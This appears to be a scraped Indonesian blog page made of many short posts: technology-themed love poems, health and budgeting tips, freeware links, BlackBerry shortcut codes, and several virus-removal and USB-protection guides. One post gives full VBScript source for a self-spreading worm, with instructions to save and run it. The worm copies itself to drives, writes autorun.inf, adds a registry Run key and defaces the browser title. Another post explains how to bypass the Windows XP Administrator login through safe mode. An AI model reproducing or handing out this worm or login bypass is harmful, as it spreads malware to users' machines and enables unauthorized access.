Kamu datang disaat aku sedang Shut Down, Hybernate dan Standby
Saat kubuka Windows kamarku di pagi hari, aku melihat Screensaver wajahmu di awan.
Wajahmu cantik,
bagaikan di edit dengan Photoshop, Photoscape atau aplikasi grafis lainnya
Tak pernah mataku buffer memandangmu...
kulitmu Lembut bagaikan kulit Apple
terus menari di Opera dalam pikiranku..
Kamulah My Dreamweaver ku
Kamulah Oracle...
Kamu selalu Online di hatiku saat yang lain offline.
Saat baru Booting ku selalu mendoakanmu

Aku adalah Spyware mu
Aku mencari tahu Favorites dan History mu
Aku melakukkan checkdisk dan diskclean up untukmu...
Kadang RAM-ku tak cukup kuat memikirkanmu,
kadang kau membuatku hang dan crashed,
Hardware ku selalu panas...
Kau adalah virus firstlove.exe yang menyerang ke seluruh tubuhku
Avira,AVG, Smadav ataupun antivirus terhebat sekalpun pun tak bisa me remove mu...
Kadang ku mau Format, bahkan install ulang diriku
agar aku bisa me remove mu dari hardisk ku
karena ku tak bisa uninstall ataupun delete kau.
karena kau sudah di Write-Protected di hatiku...
Dan data datamu sudah aku Back-up di otakku..

Maaf selama ini aku tak bisa directX mengungkapkan perasaanku padamu
aku tak bisa command prompt diriku..
sebagai gantinya, selama ini aku hanya mengirim spam saja padamu
atau hanya sinyal lewat wireless..
karena jadwal maintenance ku.
Aku tak bisa menekan CTRL+alt+Delete...
Karena Task manager has been disabled by administrator
Tapi kenapa jika kita bertemu aku selalu Not Responding...
Dengan melihatmu pikiranku langsung Ubuntu...
Padahal bahasa pemrograman kita sama,
Bahasa Java...

Tolong jangan Close this Program
Karena if you close this program you might lose information
Aku mohon Wait until this Program Responding.
Allow access this Program
Atau Turn off Firewall mu.
Hatiku ini Open Sources...
Aku ingin Upload hatiku untukmu dan Download hatimu untukku
Aku yakin suatu saat nanti kita akan menjadi suatu Embedded System..
Dan kita bisa Plug and Play...
Aku berjanji tak akan mempartisi Disk ku untuk yang lain.
Aku ingin diriku ini kau Bookmark
Dan kau jadikan My Favorites...
Di Server ini....

For someone....

Baca Selengkapnya......









Mungkin kamu sudah mengenal apa itu virus VBS, Virus VBS adalah virus sederhana menggunakan bahasa Program (Visual Basic) yang bisa merusak dari tingkat kerusakan rendah sampai tinggi. Virus ini hanya bermodalkan pengetahuan akan bahasa Program dan aplikasi Notepad. Berikut adalah cara pembuatannya:

1. Buka Notepad

2. Copy dan Paste skript Berikut:

------------------------------Skript------------------------------
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,che ck,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrent VersionRunMS32DLL",winpath&"MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title","Hacked by Zeke Hack"
rg.regwrite "HKCRvbsfileDefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"explorer.exe /e,/select, "&Wscript.ScriptFullname
---------------------------akhir skript---------------------------

3. Save as, ubah save as type menjadi "all files", simpan dengan format ".vbs", misal Hx.vbs.

hati - hati BRO... kalau mau memakai virus ini , karna sangat berbahaya!!!





semoga bermanfaat(klo ada manfaatnya...)



Baca Selengkapnya......








1. Makan Terlalu Banyak
Terlalu banyak makan, apalagi yang kadar lemaknya tinggi, dapat berakibat mengerasnya pembuluh darah otak karena penimbunan lemak pada dinding dalam pembuluh darah. Akibatnya kemampuan kerja otak akan menurun.

2. Merokok
Zat dalam rokok yang terhisap akan mengakibatkan penyusutan otak secara cepat, serta dapat mengakibatkan penyakit Alzheimer.

3. Mengkonsumsi gula terlalu banyak
Konsumsi gula yang terlalu banyak akan menyebabkan terganggunya penyerapan protein dan nutrisi, sehingga terjadi ketidakseimbangan gizi yang akan mengganggu perkembangan otak.

4. Kurang Tidur
Otak memerlukan tidur sebagai saat beristirahat dan memulihkan kemampuannya. Kekurangan tidur dalam jangka waktu lama akan mempercepat kerusakan sel-sel otak.

5. Kurang menstimulasi pikiran
Berpikir adalah cara paling tepat untuk melatih otak kita. Kurangnya stimulasi pada otak dapat menyebabkan mengkerutnya otak kita.

6. Jarang berkomunikasi
Komunikasi diperlukan sebagai salah satu sarana memacu kemampuan kerja otak. Berkomunikasi secara intelektual dapat memicu efisiensi otak. Jarangnya berkomunikasi akan menyebabkan kemampuan intelektual otak jadi kurang terlatih.

7. Memikirkan banyak hal saat sakit
Bekerja terlalu keras atau memaksakan untuk menggunakan pikiran saat sedang sakit dapat menyebabkan berkurangnya efektivitas otak serta dapat merusak otak


dari berbagai sumber


semoga bermanfaat


Baca Selengkapnya......









Virus autorun.inf sebenarnya dapat dihapus dengan menggunakan trik-trik sederhana seperti menghapus file induknya yang ada di drive C, nama filenya k4l0n6.sys.vbs, beberapa kombinasi trik-trik akan lebih baik dan sangat efektif untuk memberanas virus autorun.inf ini. Follow step dibawah ini untuk trik khusus menghapus virus autorun.inf.

Buka My Computer pilih Tools/Folder Options/unchecked hidden software, anda juga bisa menambahkan chek hidden file.Kemudian lihat di Root Directory (C), terlihat ada file “k4l0n6.sys.vbs”. Inilah file induk virus kalong tersebut.

* File “k4l0n6.sys.vbs” ini tidak dapat anda hapus sebelum anda menghapus file yang terkait dengan file ini.

* Buka dan pelajari virus tersebut cukup dengan Notepad atau text editor lainnya
* Jalankan Start/Run dan ketik REGEDIT, trus aapus file-file yang ada hubungannya ama virus kalong sebagai berikut.

* Hapus “X2 ATTCK” ada di "HKEY_CURRENT_USER/Software /Microsoft/Internet Explorer/Main/Window Title",":: X2 ATTACK ::"

* Hapus KALONG-X2/1 ada di "HKEY_CURRENT_USER/Software/Microsoft/Windows /CurrentVersion/Explorer/RunMRU/a", "KALONG-X2/1"

* Hapus “a” ada di "HKEY_CURRENT_USER/Software/Microsoft /Windows/CurrentVersion/Explorer/RunMRU/MRUList", "a"

* Hapus tulisan vaksin.com ada di "HKEY_CURRENT_USER/Software/ Microsoft/Internet Explorer/Main/Start Page", "http://www.vaksin.com"

* Hapus Kalong X2 ada di "HKEY_LOCAL_MACHINE/Software/Microsoft/ Windows/CurrentVersion/Winlogon/LegalNoticeCaption", "KALONG-X2"

* Hapus kata-kata Komputer anda Diambil alih ada di "HKEY_LOCAL_MACHINE/Software/Microsoft/ Windows/CurrentVersion/Winlogon/LegalNoticeText", "Komputer Anda Diambil Alih"

* Hapus file recycle.vbs ada di "HKEY_LOCAL_MACHINE/Software/Microsoft/ Windows/CurrentVersion/Run/Ageia", syspath & "/recycle.vbs"

* Terakhir hapus file “autorun.inf” di root directory dengan mengikuti step ke dua dibawah. Hal ini mencegah induk virus membuat filenya kembali setiap kali dihapus.

Adapun cara menghapus virus autorun.inf di hardisk atau flashdisk adalah sebagai berikut :

* Open Comand Prompot pad menu Start -- run lalu ketikkan cmd kemudian enter

* Selanjutnya ketikkan cd.. dan ulangi pada tampilan berikutnya sampai menghasilkan tampilan seperti ini C:/> hali ini dilakukan untuk masuk ke directory C, karena virus autorun.inf yang akan kita hapus ada disitu (garis miringnya kebalikan dari garis miring disamping).

* Next step ketikkan attrib -s -h -r autorun.inf lalu tekan Enter.

* Selanjutnya ketikkan del autorun.inf lalu tekan Enter

* Lakukan pada drive lainnya cukup dengan ketikkan D: dan E: dsb pada command prompt dan lakukan step-step diatas.

* Finishing Restart Komputer anda dan usahakan tidak membuaka hardisk atau flashdisk sebelum anda restart komputer anda

Silakan Mencoba mudah-mudahan anda berhasil.



Baca Selengkapnya......










Saat asik Bermain games atau sedang ngerjain tugas sampe larut malem...uhhh gatel...! si nyamuk selalu ganggu kenyamanan kita padahal lagi asik asiknya...huft...biasanya kita semprot aja pake bay*on,,atau pake lotion anti nyamuk...padahal itu semua ga ramah lingkungan dan merusak kesehatan...trus pake apaa dong??weehh jangan khawatir sekarang dah ada solusi buat ngusir nyamuk..tikus dan serangga lainya cuma pake komputer kamu...hahah masa sih...?? iyaaa kita punya software pengusir nyamuk tikus dll... Berikut penjelasan singkatnya : Nyamuk dan tikus ternyata memiliki kelemahan pada suara dengan frekuensi tertentu. Tepatnya antara 20000Hz-65000Hz, frekuensi ini disebut sebagai suara ultrasonic. Pada frekuensi tersebut nyamuk maupun tikus akan menghindari sumber bunyi tersebut, bagaikan orang teriak-teriak di kuping kita, maka kita akan segera menjauhi teriakan tersebut.

Frekuensi antara 20000Hz-65000Hz merupakan frekuensi yang tidak dapat diterima oleh telinga manusia, karena kemampuan pendengaran manusia hanya 20Hz-20000Hz saja, sehingga kita sebagai manusia tidak akan terganggu oleh suara ultrasonic ini.
Software pengusir tikus ini akan memanfaatkan speaker PC atau laptop Anda untuk mengeluarkan suara ultrasonic dengan frekuensi 20000Hz-65000Hz. Jadi, ketika Anda bekerja dengan komputer Anda baik main game, chatting, browsing, dan lain-lain, Anda tidak akan didekati mahluk-mahluk menyebalkan ini. Keren kan !!! Tertarik untuk mencobanya ? Silahkan klik DISINI untuk mendownload. Gratis !!!

Angka-angka tersebut adalah frekuensi yang dikeluarkan oleh speaker kita, angka-angka yang selalu berubah-ubah ini dimaksudkan agar nyamuk dan tikus tidak kebal terhadap frekuensi yang selalu sama. Aplikasi ini juga dapat mengusir semut, kecoa, dan lalat, namun sayangnya tidak bisa mengusir maling.apalagi setan.....Hhehehe



semoga bermanfaat...




Baca Selengkapnya......








Adalah hasil kerjasama dari Yayasan Air Putih dengan BMG. software ini sebenarnya bukan pendeteksi gempa namun sofware ini akan mengeluarkan suara saat terjadi gempa. Software ini akan menginformasikan magnitude serta lokasi episentrum alias pusat gempa yang terjadi, software ini juga akan memberitahu potensi terjadinya Tsunami. Data yang ditampilkan software ini sebenarnya dari BMKG pusat, sehingga diperlukan koneksi internet untuk transfer informasi.
http://www.blogger.com/img/blank.gif
Software ini sebenarnya dibuat untuk sistem operasi windows, namun dengan bantuan Wine (Windows Emulator), software ini juga dapat dijalankan di Ubuntu Linux. Cara penggunaan software ini sangat mudah,hanya dengan menghubungkan komputer ke internet, kemudian membuka file bmg.exe , kemudian mengklik tombol connect . Ketika terjadi gempa sistem ini akan memberi peringatan, begitu juga jika gempa tersebut berpotensi menimbulkan tsunami. Software gratis ini dapat didownload di Disini


semoga bermanfaat!!






Baca Selengkapnya......








Pasti kita sangat butuh translate saat kita punya tugas dan sebagainya.. mungkin untuk sekarang kita masih menggunakan google translate yang online untuk membantu tugas kita... ups sekarang sudah ada loh versi offlinenya saya udah coba yaah walaupun masih ada kata kata yang belum sempurna tapi lumayanlah berguna buat membantu kita... oke langsung aja kalo yang mau download
Klik Disini


semoga bermanfaat bro....




Baca Selengkapnya......









Setelah sebelumnya postingan kode rahasia semua hape gsm dan cdma kini saya kasih tambahan kode rahasia blackberry...berikut kode kode tersebut....

Menampilkan kekuatan sinyal Anda dalam desibel, bukan bar.
Tahan "Alt" dan tekan "N", "M", "L", "L" (ulangi untuk membalikkan efek)
Buku Alamat file verifikasi.
Cek data di Buku Alamat Anda untuk inkonsistensi.
Dalam Buku Alamat, tahan "Alt" dan tekan "V", "" A, "L", "D" ..

Buku Alamat membangun kembali struktur data.
Tahan "Alt" dan tekan "T", "B", "L", "D" ..

Lihat sumber kode.
Menampilkan kode sumber halaman Web.
Dalam Browser,Tekan "Alt" dan tekan "R", "B" "V", "S" ..

Bantu Aku! menu.
Menyediakan informasi teknis penting tentang perangkat Anda, karena ketika mencari dukungan teknis atau membantu di forum ...
Tahan "Alt" dan (kiri) "shift", kemudian tekan "H" ..

IMEI layar.
Menampilkan peralatan internasional untuk perangkat mobile Anda identitas (IMEI - nomor seri) pada layar ... Juga menerjemahkan dari semua ponsel GSM lainnya.
Ketik "*", "#", "0", "6", "#" pada layar Home ..

"Soft reset".
Melakukan "soft reset" perangkat Anda; (mis. Menghapus baterai selama beberapa detik).
Tekan-dan-terus "Alt", kemudian tekan-dan-terus (kiri) "shift", kemudian tekan-dan-terus "Del" ..

Event Log.
Menampilkan peristiwa log semua aktivitas sistem-tingkat yang terjadi pada perangkat Anda ...
Tahan "Alt" dan tekan "L", "G", "L", "G" ..

Semua rahasia ini telah diuji pada BlackBerry 8800 dan BlackBerry Curve 8300; ..

Dalam beberapa kasus, Anda akan perlu berada pada layar Home pada saat Anda memasukkan kode-kode ...
Kunci pintas:
A atau C = buku telepon
S = cari
F = telepon profil
W atau B = browser
H = membantu
K = kunci tombol
L = kalender
V = pesan
pesan M = folder
R = alarm
T = tugas
U = Kalkulator
I = aplikasi
O = pilihan
P = telepon.
T - ujung atas halaman (di browser)
B - Bottom halaman (di browser)
Ruang Angkasa - Halaman bawah (di browser)
ALT + Kanan Shift + Del = hard reset
D - Memo pad
U - Beralih di antara hide / unhide di bar judul (di browser)
ALT + NMLL = angka bukan bar kekuatan sinyal

semoga bermanfaat



Baca Selengkapnya......









Nih bro cara yang biasa saya pake buat buka Administrator Xp tanpa software. 100% berhasil di XP SP2. kl SP3 belom saya coba ...Tp jangan disalahgunakan atau ditiru ya....!!

1. masuk safe mode (tekan F8 ketika baru mau loading)

2. pilih safe mode sampe selese loading

3. kalau sudah ke desktop tekan CTRL+ALT+DELETE, sehingga muncul form login XP.

4. isi login dengan Administrator dan password login dengan yang baru (terserah).

5. restart lagi bro..

6. masuk ke windows normally ya bro..

7. ketika ada form login, tekan CTRL+ALT+DELETE

8. Masukkan username dan password yang barusan kamu buat yang di safe mode.

9. ENTER bro..

Ting tong,... bisa deh,..


Baca Selengkapnya......










Agar USB flash disk tidak menjadi media penyebaran virus, lakukan blokir sehingga program atau file berekstensi exe/com/bat/pif/lnk.scr atau vbs di USB flash disk tidak bisa di jalankan. Sayangnya fitur ini hanya ada pada Windows XP Prof/2003 dan Vista.
Untuk memblokir akses aplikasi di USB flash disk
caranya :
1. [klik] Start

2. [klik] RUN

3. Pada kolom RUN, ketik ‘secpol.msc’ (tanpa tanda petik),

4. Lalu pada layar “Local Security Policy”, klik [software restriction policies]. Berikutnya klik kanan pada “software restriction policies” dan pilih [Creat new policies], lalu klik kanan pada [Additional Rule], dan pilih [New Path Rule].

5. Pada kolom [Path], masukan drive untuk aplikasi yang tidak dapat dieksekusi. Karena kebanyakan malware menular dari USB flash disk berbeda. Bila ada di drive G ketiklah G:\
6. Di security level pilih [Disallowed].

7. Pilih [OK].

8. untuk menyimpan hasil perubahan tersebut klik [close] untuk keluar dari “Local Security Policy”.

9. Restart computer.

Semoga Berhasil



Baca Selengkapnya......









Berikut Tips dari saya berdasarkan Pengalaman sendiri. Silahkan diCoba.

* Pakailah sepatu Futsal, Jangan Sepatu Militer.

* Bermainlah secara Tim. Jangan secara Individu. Selain membuat anda cepat lelah, Anda juga bisa di musuhi teman se Tim anda.

* Bermainlah pada posisi Kiper. Sebab anda tidak perlu susah-susah mengejar bola. Cukup memungutnya dari dalam Gawang anda.

* Jika Tidak mau menjadi Kiper, anda bisa jadi pemain belakang, tidak perlu mengejar bola, Biarkan Teman anda yang mengejarnya sehingga menghemat energi anda. Beri mereka semangat dengan menjadi motivator yang baik.

* Jadilah pemain cadangan sampai 5 menit menjelang pertandingan selesai.

* Usulkan lawan anda untuk bermain 11 lawan 11, Sehingga anda tidak mudah capek.

* Jika anda sudah merasa Capek, minumlah air biasa. Tidak disarankan meminum Minyak tanah (mahal soalnya)

* Bawalah sesuatu yang membuat anda tetap semangat ketika berlari. Seperti mengajak Pacar anda atau Debt Collector yang selama ini mengejar anda.

* Jangan terlalu sering tertawa ketika bermain. Selain membuat cepat lelah, anda bisa di kira Gila.

* Lakukan Mentality Attack Contohnya anda bisa Memaki-maki lawan sampai dia diberi kartu merah karena telah menyundul Dada anda. dengan begitu akan menghemat energi anda.

* Jika pertandingan anda sangat penting, menyangkut hidup dan mati anda. sebaiknya lupakan Tips ini




Baca Selengkapnya......











Seorang temen pernah bertanya: “Eh, kalo gw nikah tapi dengan gaji gw yang cuma Rp***** bisa ga ya? Cukup ga ya?

Hmmm…..

Maka dari pertanyaan itu dibuat survey asal, dan berikut adalah daftar pengeluaran standar bulanan setelah merit. Sekedar berbagi aja, buat temen2 yang mungkin juga mengalami "Matery after merit phobia syndhrome"..
daftar anggaran bulanan: (asumsi :disusun berdasarkan skala proritas,disusun dengan sangat2 relatif, dan berdasarkan basic needs standar menengah ke bawah)

1. Makan

Dengan asumsi sekali makan adalah Rp. 5.000. Maka makan 3x sehari,kali 2 orang (karena lagu sepiring berdua cuma berlaku pada saat pacaran aja), kali 30 hari adalah : Rp. 900.000.

*Tips : Rajin2 ke kondangan, walimahan, atau sunatan, dan bawa pulang nasi kotaknya, pasti lebih ngirit.

2. Kontrakan

Dengan asumsi masih ngontrak di rumah petak, yang punya uda botak, tapi masih galak, dan punya anjing belum jinak. Maka dana untuk kontrakan sekitar Rp. 500.000/bulan.

*Tips : Tinggallah di Pondok Mertua Indah. Niscaya 2 dana diatas gak akan pernah ada. Di pondok mertua indah, anda akan bebas makan apa aja, termasuk "makan ati"

3. Listrik dan Air

Dengan asumsi daya listrik 900 watt dan pake jetpam maka anggaran untuk listrik adalah Rp. 100.000/bulan.

*Tips : Jangan pake AC, cukup AC (Angin Cendela). Jangan suka main Plestesyen (PS), cukup main monopoli,sudamanda atau gaple, domino ama istri terasa lebih romantis.

4. Transportasi

Dengan asumsi naik motor ke kantor, dengan motor yang paling irit rit rit, maka untuk ongkos bensin dan servis adalah Rp. 100.000.

*Tips : Gunakanlah Bensin campur! (Maksudnyah campur dorong, pasti lebih irit). Atau ikutlah “Nebeng Fans Club”, dengan alasan mempererat silaturahmi dengan yang ditebengi maka perjalanan berangkat dan pulang kantor akan terasa lebih menyenangkan.

5. Komunikasi

Dengan asumsi pake CDMA yang 1000/menit maka untuk sebulan, ongkos komunikasi berdua adalah Rp. 100.000.

*Tips : Pakelah "FREN" yang lebih murah (maksudnya kalo mau nelpon atau sms tinggal bilang “Freeen…minjam HP nya dong freen…”

6. Keperluan Sehari Hari

Seperti sabun,odol,syampu, dll dsb. Dengan asumsi tidak pake fesyel,krimbat, manikyur, pedikyur, kukyur2 maka alokasi dana untuk ini sebesar Rp.50.000.

*Tips : Mandi kalo perlu saja. Kalo dulu 2 kali sehari,jadi 2 hari sekali. Untuk ngirit odol kembalilah memakai tumbukan batu bata

7. Kesehatan

Seperti minyak kayu putih,vitamin, obat pusing (ini penting buat pengantin baru wekekekek!), maka alokasi cadangan untuk kesehatan sebesar Rp. 50.000.

*Tips : Jaga kesehatan. Jangan begadang…kalo tiada artinya…begadang bole saja…asalkan sambilronda (halah!!)

8. Entertaiment

Nha ini kalo ada uang lebih aja, bisalaah sekali2 nomat (nonton hemat, bioskop), liat live music, lari pagi di monas, atau makan martabak sekali2.

Kesimpulan Jadi, dapat kita simpulkan…Dari asumsi basic needs diatas maka pengeluaran untuk tiap bulan adalah sebesar :

Rp. 1.800.000/ bulan..

(busyeeett dah…masih gede juga ya)

Mungkin ini bisa jadi bahan pertimbangan temen2 ketika pengen nikah, untuk kemudian dibandingkan dengan pemasukan yang ada. Kalopun masih ‘besar pasak daripada tiang’ Anda bisa memperkecil pasak, atau memperbesar tiang…ataauu. ..ga usak pake pasak, tapi dipaku aja!

Tapi ada 1 hal yang ga bisa dijelaskan dengan perhitungan ketika anda memutuskan untuk menikah (Serius Mode : On)....

Yaitu, Berkah Menikah..

Selalu, Tuhan akan mencukupi kebutuhan umatnya yang mau berusaha dan berdoa. Selalu bersukur dan percaya bahwa Tuhanlah raja dari segala raja akunting..!! OK



by noveloke




Baca Selengkapnya......









Cover depan adalah tanggal lahir.
Cover belakang adalah tanggal kematian.
Tiap lembarnya, adalah tiap hari dalam hidup kita dan apa yg kita lakukan.
Ada buku yang tebal, ada buku yang tipis.
Ada buku yg menarik dibaca, ada yg sama sekali tidak menarik.
Sekali tertulis, tidak akan pernah bisa di'edit' lagi.
Tapi seburuk apapun halaman sebelumnya, selalu tersedia halaman selanjutnyayg putih bersih, baru dan tiada cacat.

Sama dengan hidup kita, seburuk apapun kemarin,Tuhan selalu menyediakan hari yang baru untuk kita.
Kita selalu diberi kesempatan baru untuk melakukan sesuatu yg benardalam hidup kita setiap harinya.
Kita selalu bisa memperbaiki kesalahan kita dan melanjutkan alurcerita kedepannya sampai saat usia berakhir, yang sudah ditetapkanNYA.

terima kasih Tuhan utk hari yg baru ini.. Syukuri hari ini dan isilah halaman buku kehidupanmu dgn hal-hal yg baik semata.
Dan jangan pernah lupa, untuk selalu bertanya kepada Tuhan, tentangapa yang harus ditulis tiap harinya.
Agar pada saat halaman terakhir buku kehidupan kita selesai, kita dapati diri ini sebagai pribadi yg berkenan kepadaNYA. Dan buku kehidupan itu layak untuk dijadikan teladan bagi anak2 kitadan siapapun setelah kita nanti.

Selamat menulis di buku kehidupanmu, Menulislah dengan tinta cinta dan kasih sayang, serta pena kebijaksanaan.‎​Tuhan tidak pernah menjanjikan bahwa langit itu selalu biru, Bunga selalu mekar dan Mentari selalu bersinar..
Tapi ketahuilah bahwa Dia selalu memberi pelangi setelah badai, Senyum di setiap air mata, berkah di setiap cobaan dan jawaban di setiap doa..



Baca Selengkapnya......









Yups setelah postingan saya sebelumnya tentang merubah falsdisk 1gb jadi 2gb, kini saya mau kasih trik yang lebih extrime lagi yaitu cara shutdown, restart, alarm dll computer hanya dengan sebuah tepukan tangan saja… ga percaya?? Okee kita buktiin… disini tentunya saya pake software… klo saya ga pake software ntarr saya dikira Tukang sulap lagi…ckckc… tapi nih software bener bener gila…namanya sleep moon v2..
sebelumnya dijelasin dulu fitur fiturnya

Software berguna untuk otomatis:
- Shutdown
- Restart
- Standby
- Log Off
- Alarm
- Display Notifikasi (Menampilkan "note" yang kita setting, misalnya pada jam 10.00 AM kita mau Aplikasi ini ngasi tau kalo kita ada janji sama si "A", atau waktunya mandi atau apapun sesuai pesan yg kita tulis)
- Eksekusi File (Jalanin Aplikasi, file *.mp3 atau file musik lain, file Video, dan file apapun)
Fitur Unik:
- Date and Time
Setting waktu bukan hanya jam dan menit tapi juga hingga detik bisa disetting)

Baca Selengkapnya......









Semenjak bertemu denganmu, energi statik benih cintamu telah mengejutkan gaya pegas jantungku, sehingga jantungku berdetak tak beraturan bagaikan gelombang bunyi gendang yang tak beraturan saat aku berada beberapa meter darimu. Refleksi cahaya cintamu telah membunuh urat mataku sehinga membiaskan bayangan wajahmu yang selalu di otakku.

Pancaran Radiasi Pesonamu membuat otakku tidak bisa berpikir rasional, sehingga elektromagnet dalam hatiku terpengaruh gelombang magnet cintamu. Sejak Saat itu, atom-atom penyusun cinta ini kian mengumpul karena gaya listrik statik dan energi Potensial di hatiku.
Saat jauh darimu, partikel-partikel cintaku tidak bisa diam sehinga melakukan tumbukan-tumbukan lenting sempurna dan menghasilkan energi rindu dengan rumus E = MC2, yang mana M adalah Masa waktu dimana semakin lama semakin jauh darimu maka energi rinduku semakin bertambah besar. Sedangkan C adalah Cintaku padamu yang berbanding lurus dengan Energi rinduku.

Usaha untuk memberikan gaya lorenzt-ku padamu telah kuberikan dengan FL = i B Sin ØØ. Mudah-mudahan dengan penurunan rumus cintaku padamu dapat memahami pemuaian cintaku padamu dan peningkatan massa jenis cintaku agar tekanan cinta dalam hatiku bisa setimbang setelah bereaksi dengan cahaya cintamu. Dimana bila FL adalah gaya cintaku padamu akan berbanding lurus dengan i (arus listrik cintaku) dan B adalah besarnya medan magnet dalam hatiku dan arah sudut refleksi cinta dengan Sin.

I intensitas

L listrik
O optik
V kecepatan
E energi

U
usaha



Baca Selengkapnya......









Jika bertemu Nadia Saphira mungkin hati bisa berbunga-bunga, tapi jika komputer terinfeksi virus 'Nadia Saphira'? Coba ikuti langkah-langkah berikut.

1. Sebaiknya putuskan komputer yang akan dibersihkan dari jaringan

2. Matikan 'System Restore' selama proses pembersihan virus (untuk Windows XP / Vista).

3. Matikan proses virus yang aktif di memory. Gunakan tools pengganti task manager, seperti CProcess (dapat anda download di situs Nirsoft)

4. Lakukan kill process, pada beberapa file virus yang aktif yaitu :
* C:\Documents and Settings\All User\Start Menu\Programs\Startup\lan.exe
* C:\WINDOWS\system32\misconfig.exe
* C:\WINDOWS\taskmgr.exe

5. Hapus string registry yang telah dibuat oleh virus. Untuk mempermudah dapat menggunakan script registry dibawah ini.

[Version]
Signature="$Chicago$"
Provider=Vaksincom Oyee
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKCR, batfile\shell\open\command,,,"""%1"" %*"
HKCR, comfile\shell\open\command,,,"""%1"" %*"
HKCR, exefile\shell\open\command,,,"""%1"" %*"
HKCR, piffile\shell\open\command,,,"""%1"" %*"
HKCR, lnkfile\shell\open\command,,,"""%1"" %*"
HKCR, scrfile\shell\open\command,,,"""%1"" %*"
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer \Advanced,
HKLM, SOFTWARE\Classes\exefile\DefaultIcon,,,""%1""
HKLM, SOFTWARE\Classes\exefile,,,"Application"
HKLM, SOFTWARE\Classes\exefile,infotip,0, "prop:FileDescription;Company;FileVersion;Crea te;S ize"
HKLM, SOFTWARE\Classes\exefile,TileInfo,0, "prop:FileDescription;Company;FileVersion"
HKCU, Software\Microsoft\Command Processor, AutoRun,0,
HKLM, SOFTWARE\Microsoft\Command Processor, AutoRun,0,
HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Exp lorer\Advanced\Folder\Hidden\SHOWALL, CheckedValue, 0x00010001,1
HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Exp lorer\Advanced\Folder\Hidden\SHOWALL, DefaultValue, 0x00010001,2
[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies \System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies \Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies \Explorer, nofind
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Policies \Explorer, nofind
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msiexec.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sessmgr.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SPYXX.exe

* Gunakan notepad, kemudian simpan dengan nama “*repair.inf*” (gunakan pilihan Save As Type menjadi All Files agar tidak terjadi kesalahan).
* Jalankan repair.inf dengan klik kanan, kemudian pilih install.
* Sebaiknya membuat file repair.inf di komputer yang clean, agar virus tidak aktif kembali.

6. Hapus file virus yang mempunyai ciri-ciri sebagai berikut :
* Icon application/folder
* Ext. exe
* Ukuran 69 kb & 17 kb
* Catatan:
* Sebaiknya tampilkan file yang tersembunyi agar mempermudah dalam proses pencarian file virus.
* Untuk mempermudah proses pencarian sebaiknya gunakan "Search Windows" dengan filter file **.exe* & **.ini* yang mempunyai ukuran 69 KB & 17 KB.
* Hapus file virus yang biasanya mempunyai date modified yang sama.

7. Tampilkan kembali folder yang disembunyikan pada drive atau flashdisk. Gunakan perintah 'ATTRIB' pada command prompt.
* Klik 'Start'
* Klik 'Run'
* Ketik 'CMD', kemudian tekan tombol Enter
* Pindahkan posisi kursor ke drive Flash Disk
* Kemudian ketik perintah *ATTRIB –s –h –r /s /d* kemudian tekan tombol enter

8. Untuk pembersihan yang optimal dan mencegah infeksi ulang, sebaiknya menggunakan antivirus yang ter-update dan mengenali virus ini dengan baik.


semoga bermanfaat




Baca Selengkapnya......








Sesuai dengan judul postingan saya, maka kita akan memperlajari cara / tips dan trik mengganti nama processor PC dengan nama lain. Trik atau cara ini dapat kamu gunakan untuk mengelabui seseorang yang akan mengira bahwa anda memiliki processor yang WAH (mahal). Lumayan iseng-iseng + belajar kan???
Nah cara-caranya sebagai berikut:

1. Masuk ke registry editor (regedit), caranya tekan ctrl + r, lalu ketikan regedit

2. Masuk ke directory registry berikut:

HKEY_LOCAL_MACHINE\HARDWARE\DISCRIPTION\System\Cen tralProcessor\ atau

HKEY_LOCAL_MACHINE\HARDWARE\DISCRIPTION\System\Cen tralProcessor\0\ atau

HKEY_LOCAL_MACHINE\HARDWARE\DISCRIPTION\System\Cen tralProcessor\1\

3. Kemudian cari string value berikut:

“ProcessorNameString” (tanpa kutip)

4. Ubah value string keys tersebut dengan nama sesuka anda (biar keren masukan aja word ini: “Intel(R) Core i7 Extreme CPU 3.20GHz” (tanpa kutip")


semoga berguna(klo ada gunanya..hehe)


Baca Selengkapnya......








